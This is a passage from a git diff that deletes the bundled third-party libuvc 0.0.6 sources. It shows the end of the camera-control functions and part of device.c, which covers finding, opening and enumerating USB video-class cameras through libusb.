-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup ctrl Video capture and processing controls
- * @brief Functions for manipulating device settings and stream parameters
- *
- * The `uvc_get_*` and `uvc_set_*` functions are used to read and write the settings associated
- * with the device's input, processing and output units.
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-
-/***** GENERIC CONTROLS *****/
-/**
- * @brief Get the length of a control on a terminal or unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit or Terminal ID; obtain this from the uvc_extension_unit_t describing the extension unit
- * @param ctrl Vendor-specific control number to query
- * @return On success, the length of the control as reported by the device. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
- */
-int uvc_get_ctrl_len(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl) {
-  unsigned char buf[2];
-
-  int ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, UVC_GET_LEN,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    buf,
-    2,
-    0 /* timeout */);
-
-  if (ret < 0)
-    return ret;
-  else
-    return (unsigned short)SW_TO_SHORT(buf);
-}
-
-/**
- * @brief Perform a GET_* request from an extension unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit ID; obtain this from the uvc_extension_unit_t describing the extension unit
- * @param ctrl Control number to query
- * @param data Data buffer to be filled by the device
- * @param len Size of data buffer
- * @param req_code GET_* request to execute
- * @return On success, the number of bytes actually transferred. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
- */
-int uvc_get_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len, enum uvc_req_code req_code) {
-  return libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    data,
-    len,
-    0 /* timeout */);
-}
-
-/**
- * @brief Perform a SET_CUR request to a terminal or unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit or Terminal ID
- * @param ctrl Control number to set
- * @param data Data buffer to be sent to the device
- * @param len Size of data buffer
- * @return On success, the number of bytes actually transferred. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
- */
-int uvc_set_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len) {
-  return libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    data,
-    len,
-    0 /* timeout */);
-}
-
-/***** INTERFACE CONTROLS *****/
-uvc_error_t uvc_get_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode *mode, enum uvc_req_code req_code) {
-  uint8_t mode_char;
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_VC_VIDEO_POWER_MODE_CONTROL << 8,
-    devh->info->ctrl_if.bInterfaceNumber,	// XXX saki
-    &mode_char,
-    sizeof(mode_char),
-    0);
-
-  if (ret == 1) {
-    *mode = mode_char;
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-uvc_error_t uvc_set_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode mode) {
-  uint8_t mode_char = mode;
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_VC_VIDEO_POWER_MODE_CONTROL << 8,
-    devh->info->ctrl_if.bInterfaceNumber,	// XXX saki
-    &mode_char,
-    sizeof(mode_char),
-    0);
-
-  if (ret == 1)
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @todo Request Error Code Control (UVC 1.5, 4.2.1.2) */
diff --git a/thirdparty/libuvc-0.0.6/src/device.c b/thirdparty/libuvc-0.0.6/src/device.c
deleted file mode 100644
index a987735..0000000
--- a/thirdparty/libuvc-0.0.6/src/device.c
+++ /dev/null
@@ -1,1791 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup device Device handling and enumeration
- * @brief Support for finding, inspecting and opening UVC devices
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-int uvc_already_open(uvc_context_t *ctx, struct libusb_device *usb_dev);
-void uvc_free_devh(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_get_device_info(uvc_device_t *dev, uvc_device_info_t **info);
-void uvc_free_device_info(uvc_device_info_t *info);
-
-uvc_error_t uvc_scan_control(uvc_device_t *dev, uvc_device_info_t *info);
-uvc_error_t uvc_parse_vc(uvc_device_t *dev,
-			 uvc_device_info_t *info,
-			 const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_selector_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_extension_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block,
-					size_t block_size);
-uvc_error_t uvc_parse_vc_header(uvc_device_t *dev,
-				uvc_device_info_t *info,
-				const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vc_input_terminal(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block,
-					size_t block_size);
-uvc_error_t uvc_parse_vc_processing_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block,
-					 size_t block_size);
-
-uvc_error_t uvc_scan_streaming(uvc_device_t *dev,
-			       uvc_device_info_t *info,
-			       int interface_idx);
-uvc_error_t uvc_parse_vs(uvc_device_t *dev,
-			 uvc_device_info_t *info,
-			 uvc_streaming_interface_t *stream_if,
-			 const unsigned char *block, size_t block_size);
-uvc_error_t uvc_parse_vs_format_uncompressed(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size);
-uvc_error_t uvc_parse_vs_format_mjpeg(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size);
-uvc_error_t uvc_parse_vs_frame_uncompressed(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_frame_format(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_frame_frame(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size);
-uvc_error_t uvc_parse_vs_input_header(uvc_streaming_interface_t *stream_if,
-				      const unsigned char *block,
-				      size_t block_size);
-
-void LIBUSB_CALL _uvc_status_callback(struct libusb_transfer *transfer);
-
-/** @internal
- * @brief Test whether the specified USB device has been opened as a UVC device
- * @ingroup device
- *
- * @param ctx Context in which to search for the UVC device
- * @param usb_dev USB device to find
- * @return true if the device is open in this context
- */
-int uvc_already_open(uvc_context_t *ctx, struct libusb_device *usb_dev) {
-  uvc_device_handle_t *devh;
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    if (usb_dev == devh->dev->usb_dev)
-      return 1;
-  }
-
-  return 0;
-}
-
-/** @brief Finds a camera identified by vendor, product and/or serial number
- * @ingroup device
- *
- * @param[in] ctx UVC context in which to search for the camera
- * @param[out] dev Reference to the camera, or NULL if not found
- * @param[in] vid Vendor ID number, optional
- * @param[in] pid Product ID number, optional
- * @param[in] sn Serial number or NULL
- * @return Error finding device or UVC_SUCCESS
- */
-uvc_error_t uvc_find_device(
-    uvc_context_t *ctx, uvc_device_t **dev,
-    int vid, int pid, const char *sn) {
-  uvc_error_t ret = UVC_SUCCESS;
-
-  uvc_device_t **list;
-  uvc_device_t *test_dev;
-  int dev_idx;
-  int found_dev;
-
-  UVC_ENTER();
-
-  ret = uvc_get_device_list(ctx, &list);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  dev_idx = 0;
-  found_dev = 0;
-
-  while (!found_dev && (test_dev = list[dev_idx++]) != NULL) {
-    uvc_device_descriptor_t *desc;
-
-    if (uvc_get_device_descriptor(test_dev, &desc) != UVC_SUCCESS)
-      continue;
-
-    if ((!vid || desc->idVendor == vid)
-        && (!pid || desc->idProduct == pid)
-        && (!sn || (desc->serialNumber && !strcmp(desc->serialNumber, sn))))
-      found_dev = 1;
-
-    uvc_free_device_descriptor(desc);
-  }
-
-  if (found_dev)
-    uvc_ref_device(test_dev);
-
-  uvc_free_device_list(list, 1);
-
-  if (found_dev) {
-    *dev = test_dev;
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  } else {
-    UVC_EXIT(UVC_ERROR_NO_DEVICE);
-    return UVC_ERROR_NO_DEVICE;
-  }
-}
-
-/** @brief Finds all cameras identified by vendor, product and/or serial number
- * @ingroup device
- *
- * @param[in] ctx UVC context in which to search for the camera
- * @param[out] devs List of matching cameras
- * @param[in] vid Vendor ID number, optional
- * @param[in] pid Product ID number, optional
- * @param[in] sn Serial number or NULL
- * @return Error finding device or UVC_SUCCESS
- */
-uvc_error_t uvc_find_devices(
-    uvc_context_t *ctx, uvc_device_t ***devs,
-    int vid, int pid, const char *sn) {
-  uvc_error_t ret = UVC_SUCCESS;
-
-  uvc_device_t **list;
-  uvc_device_t *test_dev;
-  int dev_idx;
-  int found_dev;
-
-  uvc_device_t **list_internal;
-  int num_uvc_devices;
-
-  UVC_ENTER();
-
-  ret = uvc_get_device_list(ctx, &list);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  num_uvc_devices = 0;
-  dev_idx = 0;
-  found_dev = 0;
-
-  list_internal = malloc(sizeof(*list_internal));
-  *list_internal = NULL;
-
-  while ((test_dev = list[dev_idx++]) != NULL) {
-    uvc_device_descriptor_t *desc;
-
-    if (uvc_get_device_descriptor(test_dev, &desc) != UVC_SUCCESS)
-      continue;
-
-    if ((!vid || desc->idVendor == vid)
-        && (!pid || desc->idProduct == pid)
-        && (!sn || (desc->serialNumber && !strcmp(desc->serialNumber, sn)))) {
-      found_dev = 1;
-      uvc_ref_device(test_dev);
-
-      num_uvc_devices++;
-      list_internal = realloc(list_internal, (num_uvc_devices + 1) * sizeof(*list_internal));
-
-      list_internal[num_uvc_devices - 1] = test_dev;
-      list_internal[num_uvc_devices] = NULL;
-    }
-
-    uvc_free_device_descriptor(desc);
-  }
-
-  uvc_free_device_list(list, 1);
-
-  if (found_dev) {
-    *devs = list_internal;
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  } else {
-    UVC_EXIT(UVC_ERROR_NO_DEVICE);
-    return UVC_ERROR_NO_DEVICE;
-  }
-}
-
-/** @brief Get the number of the bus to which the device is attached
- * @ingroup device
- */
-uint8_t uvc_get_bus_number(uvc_device_t *dev) {
-  return libusb_get_bus_number(dev->usb_dev);
-}
-
-/** @brief Get the number assigned to the device within its bus
- * @ingroup device
- */
-uint8_t uvc_get_device_address(uvc_device_t *dev) {
-  return libusb_get_device_address(dev->usb_dev);
-}
-
-/** @brief Open a UVC device
- * @ingroup device
- *
- * @param dev Device to open
- * @param[out] devh Handle on opened device
- * @return Error opening device or SUCCESS
- */
-uvc_error_t uvc_open(
-    uvc_device_t *dev,
-    uvc_device_handle_t **devh) {
-  uvc_error_t ret;
-  struct libusb_device_handle *usb_devh;
-  uvc_device_handle_t *internal_devh;
-  struct libusb_device_descriptor desc;
-
-  UVC_ENTER();
-
-  ret = libusb_open(dev->usb_dev, &usb_devh);
-  UVC_DEBUG("libusb_open() = %d", ret);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  uvc_ref_device(dev);
-
-  internal_devh = calloc(1, sizeof(*internal_devh));
-  internal_devh->dev = dev;
-  internal_devh->usb_devh = usb_devh;
-
-  ret = uvc_get_device_info(dev, &(internal_devh->info));
-
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  UVC_DEBUG("claiming control interface %d", internal_devh->info->ctrl_if.bInterfaceNumber);
-  ret = uvc_claim_if(internal_devh, internal_devh->info->ctrl_if.bInterfaceNumber);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  libusb_get_device_descriptor(dev->usb_dev, &desc);
-  internal_devh->is_isight = (desc.idVendor == 0x05ac && desc.idProduct == 0x8501);
-
-  if (internal_devh->info->ctrl_if.bEndpointAddress) {
-    internal_devh->status_xfer = libusb_alloc_transfer(0);
-    if (!internal_devh->status_xfer) {
-      ret = UVC_ERROR_NO_MEM;
-      goto fail;
-    }
-
-    libusb_fill_interrupt_transfer(internal_devh->status_xfer,
-                                   usb_devh,
-                                   internal_devh->info->ctrl_if.bEndpointAddress,
-                                   internal_devh->status_buf,
-                                   sizeof(internal_devh->status_buf),
-                                   _uvc_status_callback,
-                                   internal_devh,
-                                   0);
-    ret = libusb_submit_transfer(internal_devh->status_xfer);
-    UVC_DEBUG("libusb_submit_transfer() = %d", ret);
-
-    if (ret) {
-      fprintf(stderr,
-              "uvc: device has a status interrupt endpoint, but unable to read from it\n");
-      goto fail;
-    }
-  }
-
-  if (dev->ctx->own_usb_ctx && dev->ctx->open_devices == NULL) {
-    /* Since this is our first device, we need to spawn the event handler thread */
-    uvc_start_handler_thread(dev->ctx);
-  }
-
-  DL_APPEND(dev->ctx->open_devices, internal_devh);
-  *devh = internal_devh;
-
-  UVC_EXIT(ret);
-
-  return ret;
-
- fail:
-  if ( internal_devh->info ) {
-    uvc_release_if(internal_devh, internal_devh->info->ctrl_if.bInterfaceNumber);
-  }
-  libusb_close(usb_devh);
-  uvc_unref_device(dev);
-  uvc_free_devh(internal_devh);
-
-  UVC_EXIT(ret);
-
-  return ret;
-}
-
-/**
- * @internal
- * @brief Parses the complete device descriptor for a device
- * @ingroup device
- * @note Free *info with uvc_free_device_info when you're done
- *
- * @param dev Device to parse descriptor for
- * @param info Where to store a pointer to the new info struct
- */
-uvc_error_t uvc_get_device_info(uvc_device_t *dev,
-				uvc_device_info_t **info) {
-  uvc_error_t ret;
-  uvc_device_info_t *internal_info;
-
-  UVC_ENTER();
-
-  internal_info = calloc(1, sizeof(*internal_info));
-  if (!internal_info) {
-    UVC_EXIT(UVC_ERROR_NO_MEM);
-    return UVC_ERROR_NO_MEM;
-  }
-
-  if (libusb_get_config_descriptor(dev->usb_dev,
-				   0,
-				   &(internal_info->config)) != 0) {
-    free(internal_info);
-    UVC_EXIT(UVC_ERROR_IO);
-    return UVC_ERROR_IO;
-  }
-
-  ret = uvc_scan_control(dev, internal_info);
-  if (ret != UVC_SUCCESS) {
-    uvc_free_device_info(internal_info);
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  *info = internal_info;
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/**
- * @internal
- * @brief Frees the device descriptor for a device
- * @ingroup device
- *
- * @param info Which device info block to free
- */
-void uvc_free_device_info(uvc_device_info_t *info) {
-  uvc_input_terminal_t *input_term, *input_term_tmp;
-  uvc_processing_unit_t *proc_unit, *proc_unit_tmp;
-  uvc_extension_unit_t *ext_unit, *ext_unit_tmp;
-
-  uvc_streaming_interface_t *stream_if, *stream_if_tmp;
-  uvc_format_desc_t *format, *format_tmp;
-  uvc_frame_desc_t *frame, *frame_tmp;
-
-  UVC_ENTER();
-
-  DL_FOREACH_SAFE(info->ctrl_if.input_term_descs, input_term, input_term_tmp) {
-    DL_DELETE(info->ctrl_if.input_term_descs, input_term);
-    free(input_term);
-  }
-
-  DL_FOREACH_SAFE(info->ctrl_if.processing_unit_descs, proc_unit, proc_unit_tmp) {
-    DL_DELETE(info->ctrl_if.processing_unit_descs, proc_unit);
-    free(proc_unit);
-  }
-
-  DL_FOREACH_SAFE(info->ctrl_if.extension_unit_descs, ext_unit, ext_unit_tmp) {
-    DL_DELETE(info->ctrl_if.extension_unit_descs, ext_unit);
-    free(ext_unit);
-  }
-
-  DL_FOREACH_SAFE(info->stream_ifs, stream_if, stream_if_tmp) {
-    DL_FOREACH_SAFE(stream_if->format_descs, format, format_tmp) {
-      DL_FOREACH_SAFE(format->frame_descs, frame, frame_tmp) {
-        if (frame->intervals)
-          free(frame->intervals);
-
-        DL_DELETE(format->frame_descs, frame);
-        free(frame);
-      }
-
-      DL_DELETE(stream_if->format_descs, format);
-      free(format);
-    }
-
-    DL_DELETE(info->stream_ifs, stream_if);
-    free(stream_if);
-  }
-
-  if (info->config)
-    libusb_free_config_descriptor(info->config);
-
-  free(info);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get a descriptor that contains the general information about
- * a device
- * @ingroup device
- *
- * Free *desc with uvc_free_device_descriptor when you're done.
- *
- * @param dev Device to fetch information about
- * @param[out] desc Descriptor structure
- * @return Error if unable to fetch information, else SUCCESS
- */
-uvc_error_t uvc_get_device_descriptor(
-    uvc_device_t *dev,
-    uvc_device_descriptor_t **desc) {
-  uvc_device_descriptor_t *desc_internal;
-  struct libusb_device_descriptor usb_desc;
-  struct libusb_device_handle *usb_devh;
-  uvc_error_t ret;
-
-  UVC_ENTER();
-
-  ret = libusb_get_device_descriptor(dev->usb_dev, &usb_desc);
-
-  if (ret != UVC_SUCCESS) {
-    UVC_EXIT(ret);
-    return ret;
-  }
-
-  desc_internal = calloc(1, sizeof(*desc_internal));
-  desc_internal->idVendor = usb_desc.idVendor;
-  desc_internal->idProduct = usb_desc.idProduct;
-
-  if (libusb_open(dev->usb_dev, &usb_devh) == 0) {
-    unsigned char buf[64];
-
-    int bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iSerialNumber, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->serialNumber = strdup((const char*) buf);
-
-    bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iManufacturer, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->manufacturer = strdup((const char*) buf);
-
-    bytes = libusb_get_string_descriptor_ascii(
-        usb_devh, usb_desc.iProduct, buf, sizeof(buf));
-
-    if (bytes > 0)
-      desc_internal->product = strdup((const char*) buf);
-
-    libusb_close(usb_devh);
-  } else {
-    UVC_DEBUG("can't open device %04x:%04x, not fetching serial etc.",
-	      usb_desc.idVendor, usb_desc.idProduct);
-  }
-
-  *desc = desc_internal;
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/**
- * @brief Frees a device descriptor created with uvc_get_device_descriptor
- * @ingroup device
- *
- * @param desc Descriptor to free
- */
-void uvc_free_device_descriptor(
-    uvc_device_descriptor_t *desc) {
-  UVC_ENTER();
-
-  if (desc->serialNumber)
-    free((void*) desc->serialNumber);
-
-  if (desc->manufacturer)
-    free((void*) desc->manufacturer);
-
-  if (desc->product)
-    free((void*) desc->product);
-
-  free(desc);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get a list of the UVC devices attached to the system
- * @ingroup device
- *
- * @note Free the list with uvc_free_device_list when you're done.
- *
- * @param ctx UVC context in which to list devices
- * @param list List of uvc_device structures
- * @return Error if unable to list devices, else SUCCESS
- */
-uvc_error_t uvc_get_device_list(
-    uvc_context_t *ctx,
-    uvc_device_t ***list) {
-  struct libusb_device **usb_dev_list;
-  struct libusb_device *usb_dev;
-  int num_usb_devices;
-
-  uvc_device_t **list_internal;
-  int num_uvc_devices;
-
-  /* per device */
-  int dev_idx;
-  struct libusb_config_descriptor *config;
-  struct libusb_device_descriptor desc;
-  uint8_t got_interface;
-
-  /* per interface */
-  int interface_idx;
-  const struct libusb_interface *interface;
-
-  /* per altsetting */
-  int altsetting_idx;
-  const struct libusb_interface_descriptor *if_desc;
-
-  UVC_ENTER();
-
-  num_usb_devices = libusb_get_device_list(ctx->usb_ctx, &usb_dev_list);
-
-  if (num_usb_devices < 0) {
-    UVC_EXIT(UVC_ERROR_IO);
-    return UVC_ERROR_IO;
-  }
-
-  list_internal = malloc(sizeof(*list_internal));
-  *list_internal = NULL;
-
-  num_uvc_devices = 0;
-  dev_idx = -1;
-
-  while ((usb_dev = usb_dev_list[++dev_idx]) != NULL) {
-    got_interface = 0;
-
-    if (libusb_get_config_descriptor(usb_dev, 0, &config) != 0)
-      continue;
-
-    if ( libusb_get_device_descriptor ( usb_dev, &desc ) != LIBUSB_SUCCESS )
-      continue;
-
-    for (interface_idx = 0;
-	 !got_interface && interface_idx < config->bNumInterfaces;
-	 ++interface_idx) {
-      interface = &config->interface[interface_idx];
-
-      for (altsetting_idx = 0;
-	   !got_interface && altsetting_idx < interface->num_altsetting;
-	   ++altsetting_idx) {
-	if_desc = &interface->altsetting[altsetting_idx];
-
-        // Skip TIS cameras that definitely aren't UVC even though they might
-        // look that way
-
-        if ( 0x199e == desc.idVendor && desc.idProduct  >= 0x8201 &&
-            desc.idProduct <= 0x8208 ) {
-          continue;
-        }
-
-        // Special case for Imaging Source cameras
-	/* Video, Streaming */
-        if ( 0x199e == desc.idVendor && ( 0x8101 == desc.idProduct ||
-            0x8102 == desc.idProduct ) &&
-            if_desc->bInterfaceClass == 255 &&
-            if_desc->bInterfaceSubClass == 2 ) {
-	  got_interface = 1;
-	}
-
-	/* Video, Streaming */
-	if (if_desc->bInterfaceClass == 14 && if_desc->bInterfaceSubClass == 2) {
-	  got_interface = 1;
-	}
-      }
-    }
-
-    libusb_free_config_descriptor(config);
-
-    if (got_interface) {
-      uvc_device_t *uvc_dev = malloc(sizeof(*uvc_dev));
-      uvc_dev->ctx = ctx;
-      uvc_dev->ref = 0;
-      uvc_dev->usb_dev = usb_dev;
-      uvc_ref_device(uvc_dev);
-
-      num_uvc_devices++;
-      list_internal = realloc(list_internal, (num_uvc_devices + 1) * sizeof(*list_internal));
-
-      list_internal[num_uvc_devices - 1] = uvc_dev;
-      list_internal[num_uvc_devices] = NULL;
-
-      UVC_DEBUG("    UVC: %d", dev_idx);
-    } else {
-      UVC_DEBUG("non-UVC: %d", dev_idx);
-    }
-  }
-
-  libusb_free_device_list(usb_dev_list, 1);
-
-  *list = list_internal;
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/**
- * @brief Frees a list of device structures created with uvc_get_device_list.
- * @ingroup device
- *
- * @param list Device list to free
- * @param unref_devices Decrement the reference counter for each device
- * in the list, and destroy any entries that end up with zero references
- */
-void uvc_free_device_list(uvc_device_t **list, uint8_t unref_devices) {
-  uvc_device_t *dev;
-  int dev_idx = 0;
-
-  UVC_ENTER();
-
-  if (unref_devices) {
-    while ((dev = list[dev_idx++]) != NULL) {
-      uvc_unref_device(dev);
-    }
-  }
-
-  free(list);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get the uvc_device_t corresponding to an open device
- * @ingroup device
- *
- * @note Unref the uvc_device_t when you're done with it
- *
- * @param devh Device handle to an open UVC device
- */
-uvc_device_t *uvc_get_device(uvc_device_handle_t *devh) {
-  uvc_ref_device(devh->dev);
-  return devh->dev;
-}
-
-/**
- * @brief Get the underlying libusb device handle for an open device
- * @ingroup device
- *
- * This can be used to access other interfaces on the same device, e.g.
- * a webcam microphone.
- *
- * @note The libusb device handle is only valid while the UVC device is open;
- * it will be invalidated upon calling uvc_close.
- *
- * @param devh UVC device handle to an open device
- */
-libusb_device_handle *uvc_get_libusb_handle(uvc_device_handle_t *devh) {
-  return devh->usb_devh;
-}
-
-/**
- * @brief Get camera terminal descriptor for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list, but iterating through
- * it will make it no longer the camera terminal
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_input_terminal_t *uvc_get_camera_terminal(uvc_device_handle_t *devh) {
-  const uvc_input_terminal_t *term = uvc_get_input_terminals(devh);
-  while(term != NULL) {
-    if (term->wTerminalType == UVC_ITT_CAMERA) {
-      break;
-    }
-    else {
-      term = term->next;
-    }
-  }
-  return term;
-}
-
-
-/**
- * @brief Get input terminal descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_input_terminal_t *uvc_get_input_terminals(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.input_term_descs;
-}
-
-/**
- * @brief Get output terminal descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_output_terminal_t *uvc_get_output_terminals(uvc_device_handle_t *devh) {
-  return NULL; /* @todo */
-}
-
-/**
- * @brief Get selector unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_selector_unit_t *uvc_get_selector_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.selector_unit_descs;
-}
-
-/**
- * @brief Get processing unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_processing_unit_t *uvc_get_processing_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.processing_unit_descs;
-}
-
-/**
- * @brief Get extension unit descriptors for the open device.
- *
- * @note Do not modify the returned structure.
- * @note The returned structure is part of a linked list. Iterate through
- *       it by using the 'next' pointers.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_extension_unit_t *uvc_get_extension_units(uvc_device_handle_t *devh) {
-  return devh->info->ctrl_if.extension_unit_descs;
-}
-
-/**
- * @brief Increment the reference count for a device
- * @ingroup device
- *
- * @param dev Device to reference
- */
-void uvc_ref_device(uvc_device_t *dev) {
-  UVC_ENTER();
-
-  dev->ref++;
-  libusb_ref_device(dev->usb_dev);
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Decrement the reference count for a device
- * @ingropu device
- * @note If the count reaches zero, the device will be discarded
- *
- * @param dev Device to unreference
- */
-void uvc_unref_device(uvc_device_t *dev) {
-  UVC_ENTER();
-
-  libusb_unref_device(dev->usb_dev);
-  dev->ref--;
-
-  if (dev->ref == 0)
-    free(dev);
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * Claim a UVC interface, detaching the kernel driver if necessary.
- * @ingroup device
- *
- * @param devh UVC device handle
- * @param idx UVC interface index
- */
-uvc_error_t uvc_claim_if(uvc_device_handle_t *devh, int idx) {
-  int ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  if ( devh->claimed & ( 1 << idx )) {
